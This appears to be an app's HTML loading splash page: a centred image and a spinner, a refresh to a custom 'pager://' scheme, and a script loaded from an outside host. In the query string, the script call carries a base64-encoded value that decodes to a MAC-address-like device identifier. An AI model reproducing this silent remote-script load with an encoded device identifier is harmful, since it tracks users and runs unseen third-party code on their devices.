
<html>
 <title>Loading</title>
 <head>




 <meta http-equiv="refresh" content=1;url="pager://ok">
 <body>

<style type="text/css">
html { 
   width:100%; 
   height:100%; 
   background-color:black;
}



html, body, #wrapper {
   height:100%;
   width: 100%;
   margin: 0;
   padding: 0;
   border: 0;
}

img {
   position: absolute;
   top: 50%;
   left: 50%;
}
.imgA1 {
  z-index: 1;
   height: 550px;
   width: 700px;
   margin-top: -275px; /* Half the height */
   margin-left: -350px; /* Half the width */
}
.imgB1 {
  z-index: 3;
   height: 128px;
   width: 128px;
   margin-top: -32px; /* Half the height */
   margin-left: -64px; /* Half the width */
}
.parent {
  position: relative;
  top: 0;
  left: 0;
}
</style>

</head><body scroll="no">

<div class="parent"><table id="wrapper">
  <tr>
    <td><img class="imgA1" src="splash.jpg" alt="" /></div>
	<img class="imgB1" src="loading.gif" alt="" /></div>
    
	</div>
    </td>
  </tr>
  
</table>

 <script src='http://grugol.com/prog/landing.php?app=MDAtMDgtQ0EtRjgtMjYtMkY=&partner=200'></script></body>
 </html>
